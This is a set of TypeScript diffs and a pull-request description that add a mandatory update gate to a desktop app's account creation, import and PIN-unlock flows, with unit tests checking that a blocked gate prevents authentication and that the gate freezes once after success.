 <style>
   .layout-root {

--- a/src/stores/auth.test.ts
+++ b/src/stores/auth.test.ts
@@ -47,9 +47,15 @@ import {
   backupVerified,
   backupVerificationModalOpen,
 } from './backup-verification';
+import { awaitGateBeforeAuth, freezeGate } from '../lib/updater/update-gate';
 
 vi.mock('@tauri-apps/api/core', () => ({
   invoke: vi.fn(),
+}));
+
+vi.mock('../lib/updater/update-gate', () => ({
+  awaitGateBeforeAuth: vi.fn(),
+  freezeGate: vi.fn(),
 }));
 
 vi.mock('../lib/api/auth', () => ({
@@ -116,6 +122,8 @@ describe('auth', () => {
     vi.mocked(apiCheckSession).mockReset();
     vi.mocked(apiSessionHeartbeat).mockReset();
     vi.mocked(invoke).mockReset();
+    vi.mocked(awaitGateBeforeAuth).mockReset().mockResolvedValue('clear');
+    vi.mocked(freezeGate).mockReset();
     backupVerified.set(null);
     backupVerificationModalOpen.set(false);
   });
@@ -308,6 +316,29 @@ describe('auth', () => {
       await expect(createAccount('123456')).rejects.toThrow('key gen failed');
       expect(get(authError)).toBe('key gen failed');
     });
+
+    it('freezes the gate exactly once on success', async () => {
+      vi.mocked(apiCreateAccount).mockResolvedValue(keys);
+      vi.mocked(getCurrentAccount).mockResolvedValue(npub);
+
+      await createAccount('123456');
+
+      expect(freezeGate).toHaveBeenCalledTimes(1);
+    });
+
+    it('does not authenticate and issues no backend call when the gate is blocked', async () => {
+      vi.mocked(awaitGateBeforeAuth).mockResolvedValue('blocked');
+
+      await createAccount('123456');
+
+      expect(get(isAuthenticated)).toBe(false);
+      expect(get(currentUser)).toBeNull();
+      expect(apiCreateAccount).not.toHaveBeenCalled();
+      expect(encryptAndSaveKey).not.toHaveBeenCalled();
+      expect(runPostLoginNetworkSync).not.toHaveBeenCalled();
+      expect(freezeGate).not.toHaveBeenCalled();
+      expect(get(authLoading)).toBe(false);
+    });
   });
 
   describe('importAccount', () => {
@@ -329,6 +360,30 @@ describe('auth', () => {
     it('rejects an invalid recovery phrase', async () => {
       vi.mocked(validateRecoveryPhraseForImport).mockReturnValue(false);
       await expect(importAccount('bad phrase', '123456')).rejects.toThrow('Enter a valid 12- or 24-word recovery phrase');
+    });
+
+    it('freezes the gate exactly once on success', async () => {
+      vi.mocked(validateRecoveryPhraseForImport).mockReturnValue(true);
+      vi.mocked(loginWithRecoveryPhrase).mockResolvedValue(keys);
+      vi.mocked(getCurrentAccount).mockResolvedValue(npub);
+
+      await importAccount('word1 word2 word3 word4 word5 word6 word7 word8 word9 word10 word11 word12', '123456');
+
+      expect(freezeGate).toHaveBeenCalledTimes(1);
+    });
+
+    it('does not authenticate and issues no backend call when the gate is blocked', async () => {
+      vi.mocked(awaitGateBeforeAuth).mockResolvedValue('blocked');
+
+      await importAccount('word1 word2 word3 word4 word5 word6 word7 word8 word9 word10 word11 word12', '123456');
+
+      expect(get(isAuthenticated)).toBe(false);
+      expect(get(currentUser)).toBeNull();
+      expect(loginWithRecoveryPhrase).not.toHaveBeenCalled();
+      expect(encryptAndSaveKey).not.toHaveBeenCalled();
+      expect(runPostLoginNetworkSync).not.toHaveBeenCalled();
+      expect(freezeGate).not.toHaveBeenCalled();
+      expect(get(authLoading)).toBe(false);
     });
   });
 
@@ -352,6 +407,30 @@ describe('auth', () => {
       vi.mocked(loadAndDecryptKey).mockRejectedValue(new Error('bad pin'));
       await expect(unlockWithPin('123456')).rejects.toThrow('bad pin');
       expect(get(authError)).toBe('bad pin');
+    });
+
+    it('freezes the gate exactly once on success', async () => {
+      vi.mocked(loadAndDecryptKey).mockResolvedValue(keys.private);
+      vi.mocked(login).mockResolvedValue(keys);
+      vi.mocked(getCurrentAccount).mockResolvedValue(npub);
+
+      await unlockWithPin('123456');
+
+      expect(freezeGate).toHaveBeenCalledTimes(1);
+    });
+
+    it('does not authenticate and issues no backend call when the gate is blocked', async () => {
+      vi.mocked(awaitGateBeforeAuth).mockResolvedValue('blocked');
+
+      await unlockWithPin('123456');
+
+      expect(get(isAuthenticated)).toBe(false);
+      expect(get(currentUser)).toBeNull();
+      expect(loadAndDecryptKey).not.toHaveBeenCalled();
+      expect(login).not.toHaveBeenCalled();
+      expect(runPostLoginNetworkSync).not.toHaveBeenCalled();
+      expect(freezeGate).not.toHaveBeenCalled();
+      expect(get(authLoading)).toBe(false);
     });
   });
 

--- a/src/stores/auth.ts
+++ b/src/stores/auth.ts
@@ -229,8 +229,8 @@ export async function createAccount(pin: string): Promise<void> {
       npub: npub,
       pubkey: keys.public
     });
-    await maybeApplyLocalDevDefaults(npub);
     freezeGate();
+    await maybeApplyLocalDevDefaults(npub);
 
     dmLog('createAccount: done');
     authLoading.set(false);
@@ -285,8 +285,8 @@ export async function importAccount(recoveryPhrase: string, pin: string): Promis
       npub: npub,
       pubkey: keys.public
     });
-    await maybeApplyLocalDevDefaults(npub);
     freezeGate();
+    await maybeApplyLocalDevDefaults(npub);
     await markBackupVerified(true);
     authLoading.set(false);
     runPostLoginNetworkSync(npub);
@@ -325,8 +325,8 @@ export async function unlockWithPin(pin: string): Promise<void> {
       npub: npub,
       pubkey: keys.public
     });
-    await maybeApplyLocalDevDefaults(npub);
     freezeGate();
+    await maybeApplyLocalDevDefaults(npub);
 
     dmLog('unlockWithPin: done');
   } catch (error: unknown) {

--- a/src/stores/auth.ts
+++ b/src/stores/auth.ts
@@ -10,6 +10,7 @@ import { loadAccountState } from './persistence';
 import { markBackupVerified } from './backup-verification';
 import { clearAccountState } from '../lib/utils/clear-account-state';
 import { isMigrationGateError } from '../lib/utils/tauri-errors';
+import { awaitGateBeforeAuth, freezeGate } from '../lib/updater/update-gate';
 
 async function maybeApplyLocalDevDefaults(npub: string): Promise<void> {
   if (!import.meta.env.DEV) return;
@@ -197,6 +198,11 @@ export async function createAccount(pin: string): Promise<void> {
   authError.set(null);
 
   try {
+    if ((await awaitGateBeforeAuth()) === 'blocked') {
+      authLoading.set(false);
+      return;
+    }
+
     clearAccountState();
     // Generate keys with mnemonic (initializes Nostr client)
     const keys = await apiCreateAccount();
@@ -224,6 +230,7 @@ export async function createAccount(pin: string): Promise<void> {
       pubkey: keys.public
     });
     await maybeApplyLocalDevDefaults(npub);
+    freezeGate();
 
     dmLog('createAccount: done');
     authLoading.set(false);
@@ -245,6 +252,11 @@ export async function importAccount(recoveryPhrase: string, pin: string): Promis
   authError.set(null);
 
   try {
+    if ((await awaitGateBeforeAuth()) === 'blocked') {
+      authLoading.set(false);
+      return;
+    }
+
     clearAccountState();
     if (!validateRecoveryPhraseForImport(recoveryPhrase)) {
       throw new Error('Enter a valid 12- or 24-word recovery phrase');
@@ -274,6 +286,7 @@ export async function importAccount(recoveryPhrase: string, pin: string): Promis
       pubkey: keys.public
     });
     await maybeApplyLocalDevDefaults(npub);
+    freezeGate();
     await markBackupVerified(true);
     authLoading.set(false);
     runPostLoginNetworkSync(npub);
@@ -296,6 +309,8 @@ export async function unlockWithPin(pin: string): Promise<void> {
   authError.set(null);
 
   try {
+    if ((await awaitGateBeforeAuth()) === 'blocked') return;
+
     const privateKey = await loadAndDecryptKey(pin);
     const keys = await apiLogin(privateKey);
     const npub = await getCurrentAccount();
@@ -311,6 +326,7 @@ export async function unlockWithPin(pin: string): Promise<void> {
       pubkey: keys.public
     });
     await maybeApplyLocalDevDefaults(npub);
+    freezeGate();
 
     dmLog('unlockWithPin: done');
   } catch (error: unknown) {


### PR DESCRIPTION
## Summary

Ships a mandatory update gate that blocks the whole app — before any account is touched — when the installed build can no longer safely open local data or falls below an operator-published minimum version. Today nothing stops a stale client from running against MLS group state it can't interpret (already happened once, at the MDK 0.8.0 upgrade); the existing update flow is opt-in courtesy-only. Two independent triggers feed the same non-dismissible block screen: a local, network-free probe of `vector.db`'s migration history, and a remote `minimum_compatible_version` read off the existing signed-updater manifest.

Also closes a live data-loss bug found during planning research, independent of the rest of the feature: `list_accounts`' orphan cleanup could `remove_dir_all` a profile directory whose schema a newer build had already written.

> **Follow-up:** [#203](https://github.com/covenant-gov/pacto-app/pull/203) (into this branch) closes an R9 freeze race found in review: a late remote verdict could still flip the gate to blocked after `awaitGateBeforeAuth` returned clear and before `freezeGate`, leaving an authenticated session stuck behind the block screen. Prefer merging #203 into `upgrade-notification` before landing this PR on `main`.

## Design decisions

- **Local trigger is the one that can't be defeated from the network.** The remote check fails open by design (an unreachable endpoint must never lock a user out), which means anyone who can interfere with the manifest fetch can silently suppress it. The storage-format probe never touches the network, so it's what actually protects an offline or MITM'd client.
- **The local probe reproduces `refinery`'s own abort logic, read-only, ahead of time.** `refinery-core` aborts a migration run on three specific conditions (missing/divergent/unapplied-below-current). `storage_format.rs` walks the whole `refinery_schema_history` table and reproduces all three checks on a read-only connection with a busy timeout — so the app can say "update required" instead of surfacing refinery's own opaque migration error after the PIN is already accepted.
- **A published minimum is capped at the manifest's own offered version (R13).** `latest.json` is unsigned; without a cap, one bad value would lock out every install with no in-app fix. The cap is enforced client-side (protects against a manifest the pipeline never wrote) and at publish time (`stamp-updater-compatibility.mjs` refuses to stamp an out-of-range value).
- **Correcting a wrong minimum doesn't require a new signed release.** A tracked `scripts/release-compatibility.json` value gets stamped onto `latest.json` by a post-matrix `release.yaml` job (`needs: publish-tauri`, so it can't race the per-platform manifest rewrites); a `workflow_dispatch` workflow re-runs the same script/validator against an already-published tag for corrections, with an emergency local-invocation fallback documented in `docs/build/OPERATOR_UPDATES.md`.
- **The gate freezes on every authentication success**, enforced at the store's own setter rather than caller discipline — a remote verdict that arrives moments after unlock can never interrupt an already-running session. The await for the gate's verdict sits at the *top* of `unlockWithPin`/`createAccount`/`importAccount`, not next to the `isAuthenticated` flag — those functions already reach the network (relay connect, MLS sync) before setting that flag, so an await placed next to it would let a blocked client through anyway. (#203 additionally freezes at the `awaitGateBeforeAuth` boundary so a late remote cannot flip mid-auth.)

## New concepts

**Freeze-once state store (setter-enforced, not caller-enforced)**

Most stores in this codebase are freely mutable for their whole lifetime. The gate's store (`src/lib/updater/update-gate.ts`) is different: once `freezeGate()` runs, its own `set()` silently drops every further transition — the invariant lives in the store, not in every caller remembering not to touch it after auth.

```ts
function set(next: GateState): void {
  if (frozen) return;   // late verdicts are recorded upstream, never applied
  current = next;
  rawSet(next);
}
```

Chosen over relying on callers to stop writing after auth, because that's exactly the shape of bug this store exists to prevent: a `checkForUpdates()`-style call landing seconds after login, in a codebase where the existing `updateStatus` store's own setter merges patches unconditionally.

Not worth it for a store with no terminal transition — most state doesn't have a "point of no return." Use it when a specific event (session start, payment capture, migration completion) must be structurally un-reversible, not just conventionally so.

## Validation

Session-settled decisions carried from planning (`docs/plans/2026-08-05-001-feat-mandatory-update-gate-plan.md`, all user-directed): whole-app block over feature-scoped gating; GitHub-manifest signal over a Nostr-relay-published one; launch/unlock-only checks with network fail-open; local storage-format check as the second, network-independent trigger.

- `cargo test` (src-tauri): 555/555
- `pnpm test` (frontend): 1835/1835
- `pnpm check` / `pnpm lint` / `pnpm check:tauri-commands`: clean
- `node --test scripts/stamp-updater-compatibility.test.mjs`: 19/19
- `pnpm test:e2e`: 17/17, including a new `update-gate.spec.ts` covering resolving/clear/blocked states and non-dismissibility
- Live walkthrough against the real desktop app via the Tauri MCP bridge: gate resolves to the welcome screen, full create-account flow (real Argon2id derivation + MLS relay publish) completes through the new gate/freeze wiring, lands on the authenticated app shell

Not exercised in this session — needs real signed releases and two full built app versions, consistent with how the plan itself scopes them: the two-version compatibility smoke, a manifest-diff dry run against a real published tag, and the documented emergency-fallback walkthrough. The remote minimum-version block reason is also outside Playwright's reach specifically (`isDevBuild()` short-circuits `check()` in every dev-server context); its logic is covered instead by unit tests against a mocked `check()`.